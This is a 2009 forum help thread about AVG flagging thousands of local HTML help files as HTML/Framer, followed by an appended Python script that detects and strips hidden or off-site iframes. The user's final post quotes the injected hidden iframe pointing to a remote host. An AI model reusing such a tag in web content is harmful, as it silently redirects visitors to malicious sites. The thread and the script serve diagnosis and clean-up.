
avg 8.5 reports over 2000 html/framer viruses


8 replies to this topic

#1 DGordon
  • Members
  • 6 posts

Posted 15 May 2009 - 08:54 PM

Hello. This is my first post here so hope it makes some sense to someone. I normally run Vista32, but also have winXP on a separate HD. I only have one or the other connected just in case I have problems (like now). Yesterday I ran AVG8.5 on Vista just after getting the latest update. It ran clean about 2 weeks ago, but now it detected over 2,000 hits with the HTML/Framer virus! It put them all in the vault, but could not heal the files. I also restored one file and ran the DRWEB scanner and it did not detect this virus. Prior to running avg I updated windows defender and it ran clean also. The only changes in the past week or two have been downloading and installing EA burnout paradise ultimate box demo, a java update and a Firefox update. Also done some normal surfing, but not to any devious sites that I am aware of. Other than the AVG hits, nothing else seemed to be wrong with the system. I have installed all of the Vista updates when they are available.
Although I get no more hits with all of the HTM files in the AVG vault, I have been reluctant to go online, that's why I switched back to winXP to research this.
Several months ago I got hit with a win32 Virut infection and was able fix/repair the files with DrWeb Live. Since then I have installed and enabled AVG8.5, SuperAntiSpyware, Sbybot S&D, AdAware and the add on Vista Firewall. I have always installed the security fixes and defender upgrades, so I am not sure how I could have gotten so many infections without one of these telling me something. I also run Firefox and not IE. I have also downloaded to a thumb drive, malwarebytes and ATF cleaner so that I can run them on the vista machine without going online. Any other help/suggestions would be greatly appreciated.

Thanks, DGordon

#2 garmanma
    Computer Masochist
  • Members
  • 27,809 posts
  • Gender:Male
  • Location:Cleveland, Ohio

Posted 16 May 2009 - 07:58 PM

If you truly had Virut, I doubt if you removed it entirely with Dr. Web
It's almost impossible. That's why we recommend reformat/reinstall
Run mbam and SAS and post the logs, let's see what they show
Mark
why won't my laptop work?

Having grandkids is God's way of giving you a 2nd chance because you were too busy working your butt off the 1st time around
Do not send me PMs with problems that should be posted in the forums. Keep it in the forums, so everyone benefits
Become a BleepingComputer fan: Facebook and Twitter

#3 DGordon
  • Topic Starter
  • Members
  • 6 posts

Posted 18 May 2009 - 11:51 AM

Thanks for the reply. I will be out of town for the next week or so. I will rerun SAS (SuperAntiSpyware?) and I assume mbam is MalwareBytes? I will run them both and post the logs. If I can't get it done before next week, should I post another message here? Many Thanks. DGordon

#4 DGordon
  • Topic Starter
  • Members
  • 6 posts

Posted 19 May 2009 - 08:51 PM

Hi again. Due to a delay in my trip, I will be around most of this week. I ran Mbam and SAS. Sas ran clean so I can't find any log for it. Mbam found 2 reg keys and 1 file infected. I will paste the mbam log here. I hope this is how to do it. It is only one page. It looks like it pasted in here ok. Although it shows no action taken, I did select the items and they were moved to Quarantine. See below the dashed line for a portion of the AVG list. It looks like it found the HTML/Framer in just about every htm and html file on my Vista system. I looked for info on this virus on the AVG site, but found nothing. Many thanks for your assistance.

Malwarebytes' Anti-Malware 1.36
Database version: 1945
Windows 6.0.6001 Service Pack 1

5/18/2009 3:58:18 PM
mbam-log-2009-05-18 (15-58-06).txt

Scan type: Full Scan (C:\|D:\|)
Objects scanned: 388414
Time elapsed: 1 hour(s), 51 minute(s), 29 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 2
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 1

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdss.exe (Security.Hijack) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xcommsvr.exe (Security.Hijack) -> No action taken.

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
C:\Windows\System32\FInstall.sys (Backdoor.Bot) -> No action taken.

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The following is about a page of the over 4K hits of the HTML/Framer virus found by AVG 8.5

Scan "Scan whole computer" was finished.,,,
Infections;"4925";"0";"4925",,,
Warnings;"11",,,
Folders selected for scanning:;"Scan whole computer",,,
Scan started:;"Monday,05/18/09,2009," 4:34:40 PM"""
Scan finished:;"Monday,05/18/09,2009," 6:05:33 PM (1 hour(s) 30 minute(s) 53 second(s))"""
Total object scanned:;"970152",,,
User who launched the scan:;"Don",,,
,,,
Infections,,,
File;"Infection";"Result",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\Hu\TOP BANNER.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\Hu\Updating_your_sound_driver.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\Hu\Updating_your_video_driver.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\Hu\Video_Card.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\Hu\Warranty.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\Hu\Welcome.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\CD_DVD_Issues.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\CD_DVD_Issues2.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\CD_DVD_Troubleshooting.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Crash_Issues3.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Crashes.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\DirectX.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Display_Settings.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\EA_HELP_IT.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Emptying_Temporary_Files.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Error_message.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Graphic_corruption.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Installing_the_game.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\LEFT HAND INDEX.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Manually_starting_the_game.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Sound_card.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Starting_the_game.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\TOP BANNER.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Updating_your_sound_driver.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Updating_your_video_driver.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Video_Card.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Welcome.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\blue_screen_.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\cd_dvd_issues.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\cd_dvd_issues2.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\CD_DVD_Troubleshooting.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\crash_issues2.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\crash_issues3.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\crashes.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\display_settings.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\EA_HELP_NL.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\Emptying_Temporary_Files.htm;"Virus found HTML/Framer";"Infected",,,

---------------------------------------------------------------------------------------------------------------------------------------------------

#5 garmanma
    Computer Masochist
  • Members
  • 27,809 posts
  • Gender:Male
  • Location:Cleveland, Ohio

Posted 20 May 2009 - 07:21 PM

I would really consider option 2, but the choice is yours

Two options left: Post a HJT log or re-install

If you want to give removal of the infection a try, please read the pinned topic titled "Preparation Guide For Use Before Posting A Hijackthis Log". If you cannot complete a step, then skip it and continue with the next. In Step 6 there are instructions for downloading and running DDS which will create a Pseudo HJT Report as part of its log.

When you have done that, post your log in the HijackThis Logs and Malware Removal forum, NOT here, for assistance by the HJT Team Experts. A member of the Team will walk you through, step by step, on how to clean your computer. If you post your log back in this thread, the response from the HJT Team will be delayed because your post will have to be moved. This means it will fall in line behind any others posted that same day.

====================================

Option 2
Some types of malware can result in a system so badly damaged that a Repair Install will NOT help! Reinstalling Windows without first wiping the entire hard drive with a repartition and/or format will not remove the infection. The reinstall will only overwrite the Windows files. Any malware on the system will still be there afterwards. Starting over by wiping your drive, reformatting, and performing a clean install of the OS or doing a factory restore removes everything and is the safest action.

In case you need help with this, please review: These links include step-by-step instructions with screenshots: Reformatting a hard disk deletes all data. If you decide to reformat, you can back up all your important documents, personal data files and photos. The safest practice is not to backup any executable files (*.exe), screensavers (*.scr) or autorun (.ini) files because they may be infected by malware appending itself to the executable. Some types of malware may even disguise itself by adding and hiding its extension to the existing extension of files so be sure you look closely at the full file name. After reformatting, as a precaution, make sure you scan these files with your anti-virus prior to copying them back to your hard drive.

Note: If you're using an IBM, HP, Compaq or Dell machine, you may not have an original XP CD Disk. By policy Microsoft no longer allows OEM manufacturers to include the original Windows XP CD-ROM on computers sold with Windows preinstalled. Instead, most computers manufactured and sold by OEM vendors come with a vendor-specific Recovery Disk or Recovery Partition for performing a clean "factory restore" that will reformat your hard drive, remove all data and restore the computer to the state it was in when you first purchased it.

If you need additional assistance with reformatting, you can start a new topic in the Windows XP Home and Professional forum.
Mark

#6 DGordon
  • Topic Starter
  • Members
  • 6 posts

Posted 28 May 2009 - 12:02 PM

Mark, thanks for the response. I have a few more questions before I decide to try removal or format/reinstall. Briefly, when I got hit a few months ago with Virut, I had downloaded 2 shareware helicopter sims and the original sites sent me off to a mirror site for the downloads. Normally I don't download except from the originals, but that was the only option. After getting the files that were scanned on download as OK, I set up Vista in an offline mode and disconnected the modem. I then scanned the two files with AVG 7.5 with current signature files and they said OK so I installed the programs. I played with them a while and noticed the response got choppy a few times so I looked at the task manager and while I normally have only 20 processes running in my offline setup, this time there were about 25. The extras were sopidkc.exe, rundll33.exe, mabidwe.exe and msrstart.exe. I then went online with my XP system and several google hits said these were due to virut. I went back to vista and manually found and moved these exe's to a folder on my D: drive and renamed them to txt files. Then I ran a full scan of avg, spybot s&d, windows defender and SAS. They found a few things like Trojan.StartPage.1505, TrojanPacked.149 and several tracking cookies. After this avg7.5 ran ok but I stayed offline on Vista. I did more checking on my XP machine and found on AVG's website a virut removal tool called rmvirut. I downloaded (on XP) and moved it to vista with usb drive. When I ran it, it said I had over 2000 virut infected files that it could not clean (I think because of the operating system not allowing access). On doing more research I found the Dr Web live boot disk that runs on a small linux system bootable from the CD. I did this and it also found over 2000 infected files. I tried the repair option and to my surprise it said it repaired all but 2 or 3 files that I deleted. I then rebooted vista and ran the avg rmvirut and it found no more infections.
I also ran just about everything else I could find with no more errors. I ran the machine offline several days and ran many of the programs that were infected, constantly rescanning with no errors and no strange processes showing up. I also installed avg 8.5 and enabled all the protection as well as the latest spybot s&d with max protection. I installed the Vista Firewall program that allows control of in and out and set it up initially to not allow anything without a pop up message. I then went online and watched closely for anything strange. It all seemed ok, so I allowed Vista update to run including the latest defender signatures. Then I went offline and rescanned with everything I had and found nothing. I did this on and off for about a week or two, then assumed I was OK once again. Then about two weeks ago I downloaded the latest AVG 8.5 sigs, ran a complete scan and it then found the thousands of HTML/Framer viruses. I ran everything else with no errors. Also last week I ran AVAST antivirus and it found NO problems with the files detected by avg. I then took one of the "infected" files and renamed it to a .txt file and put it on a usb drive. Avg scan on vista again detected the html/framer even when renamed to .txt. I then made certain that autostart was off on my xp machine (deleted the reg key that controls autostart) and scanned the drive with avg 7.5 and it found NO problem....

Sorry, I thought this would be brief but I am at the bottom of the page already. I hope I have been articulate enough so you can follow this. My main concern is: is this really a virus? Is there somewhere I could upload this file to be checked specifically for the html/framer? Could this be a false positive due to my having too many malware programs installed (although the same setup ran error free the week before)? I have avg8.5 as the only active antivirus, but windows defender and Spybot are also in an active protect mode as well.

Another question is if I try to fix this (with your help), can this be done without bringing the Vista machine online? I am really concerned about going online at this point. Do you think that this html/framer could be related in any way to the previous Virut problem? One other thing that may be related is that before finding the current framer problem, I had a popup about updating java and macromedia flash that I did accept and run. This was a day or two before I ran the full scan to find the problem. I did go in and uninstall the updates just in case. In retrospect this is something I will never do again except thru Windows Update or going directly to the site.....

Thanks again for your time.
DGordon

#7 quietman7
    Bleepin' Janitor
  • Global Moderator
  • 51,895 posts
  • Gender:Male
  • Location:Virginia, USA

Posted 28 May 2009 - 12:30 PM

HTML/Framer.Z is a malicious HTML file usually sent via spam email messages. It contains an “iframe” HTML tag that can redirect users to a site with malicious script to download additional threats.

HTML/Framer.Z

This type of issue is caused when the web server itself gets compromised and the actual HTML code itself is changed... Normally it's a linked script that is added to the code itself...

AVG Forums: HTML/Framer
AVG Forums: HTML/Framer.Z

Edited by quietman7, 28 May 2009 - 12:31 PM.

Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

#8 DGordon
  • Topic Starter
  • Members
  • 6 posts

Posted 31 May 2009 - 01:18 PM

Thanks for the response. The avg refs lead to a dead end, although the question is similar to my problem. Is there anyone that can help me decide on trying to fix (not just remove) all of these htm and html files. Please read my previous post. Also what would be my exposure if I did go online to get the latest avg update to see if anything has changed? Anyone care to speculate on why or how the html/framer virus would be on over 6,000 HTML files if this is not a false positive? I am so frustrated by the so called SECURITY of Vista that I am about to dump it and go back to XP.....

#9 DGordon
  • Topic Starter
  • Members
  • 6 posts

Posted 31 May 2009 - 02:18 PM

Hi again. I was doing some research on the html/framer and after renaming one of the htm files to .txt, I found this at the end of the file:

</form>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
</body>
</html>

Is this the code that redirects to a website? If so, what part of this would I have to delete/change. Also does this for sure mean this is a legit virus?
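The hidden iframe quoted in the post above is the "iframe HTML tag that can redirect users" from quietman7's description of HTML/Framer, and the last two posts ask how to tell whether a given .htm file carries one and which part to remove. The following Python script is an added example written for this thread; it is not code from BleepingComputer, AVG or any poster. It parses .htm/.html files, reports every iframe that is hidden by CSS or sized to 0/1 pixel, or that loads from an off-site host, and can strip such elements from a copy of the file while leaving ordinary frames (relative, visible) untouched. The sample pages embedded in it are constructed, and the host malicious.example.invalid is a placeholder standing in for whatever host appears in a real tag. A hit confirms that the file was modified; it does not say what on the system modified thousands of files, which is the question the malware removal team has to answer before the files are worth repairing.

```python
"""Triage helper: find (and optionally strip) hidden or off-site <iframe> tags in .htm/.html files.

Added example for this thread, not code from BleepingComputer, AVG or any poster.
The sample pages and the host malicious.example.invalid below are constructed placeholders.
"""
import re
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

# CSS that hides the frame from the user, as in the tag quoted in the thread (style="display:none").
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# A whole <iframe ...>...</iframe> element; used only by the stripping function.
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>.*?</iframe\s*>", re.I | re.S)


class IframeFinder(HTMLParser):
    """Collects every <iframe> start tag with its src, whether it is hidden, and its line number."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":          # HTMLParser lower-cases tag and attribute names for us
            return
        a = {name: (value or "") for name, value in attrs}
        hidden = (bool(HIDDEN_STYLE.search(a.get("style", "")))
                  or a.get("width") in ("0", "1") or a.get("height") in ("0", "1"))
        self.hits.append({"src": a.get("src", ""), "hidden": hidden, "line": self.getpos()[0]})


def find_iframes(html_text):
    """All iframes in the page, benign or not."""
    parser = IframeFinder()
    parser.feed(html_text)
    parser.close()
    return parser.hits


def suspicious_iframes(html_text, trusted_hosts=()):
    """Iframes that are hidden, or that load from a host not on the caller's trusted list.

    Local help files normally frame only relative paths (no host), so any absolute host is reported.
    """
    out = []
    for hit in find_iframes(html_text):
        host = urlparse(hit["src"]).hostname or ""
        if hit["hidden"] or (host and host not in trusted_hosts):
            out.append({**hit, "host": host})
    return out


def remove_injected_iframes(html_text, trusted_hosts=()):
    """Return the page with suspicious iframe elements deleted; benign frames are kept verbatim.

    Caveat: only well-formed <iframe ...>...</iframe> pairs are matched. Work on a copy and
    keep the original for comparison.
    """
    def keep_or_drop(match):
        return "" if suspicious_iframes(match.group(0), trusted_hosts) else match.group(0)
    return IFRAME_TAG.sub(keep_or_drop, html_text)


def scan_tree(root, patterns=("*.htm", "*.html"), trusted_hosts=()):
    """Walk a folder tree (for example a game's help directory) and map file path -> findings."""
    findings = {}
    for pattern in patterns:
        for path in Path(root).rglob(pattern):
            try:
                text = path.read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue
            hits = suspicious_iframes(text, trusted_hosts)
            if hits:
                findings[str(path)] = hits
    return findings


# Constructed samples. The first mirrors the tail quoted in the thread, with a placeholder host.
SAMPLE_INJECTED = """<html><body>
<form action="search.htm"><input name="q"></form>
<iframe src="http://malicious.example.invalid/rc/" style="display:none"></iframe>
</body>
</html>"""

SAMPLE_CLEAN = """<html><body>
<h1>Updating your video driver</h1>
<iframe src="video_card.htm" width="600" height="400"></iframe>
</body></html>"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                       # usage: python framer_check.py <folder>
        for path, hits in scan_tree(sys.argv[1]).items():
            for h in hits:
                print(f"{path}: line {h['line']}: iframe -> {h['src'] or '(no src)'} hidden={h['hidden']}")
    else:
        print(suspicious_iframes(SAMPLE_INJECTED))   # one hidden, off-site frame on line 3
        print(suspicious_iframes(SAMPLE_CLEAN))      # []
```

Run it with the help folder as the argument (for example the EA Help directory listed in the AVG output) from the offline machine or from the other OS with the drive mounted; it only reads files. The report is enough to answer "is this the redirect?" and "which part would I delete?": the whole `<iframe ...></iframe>` element is the injected part, and nothing else on the page depends on it. Whether to repair or reformat is still the call the thread discusses, because a file-level clean-up does not address what wrote the tag in the first place.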



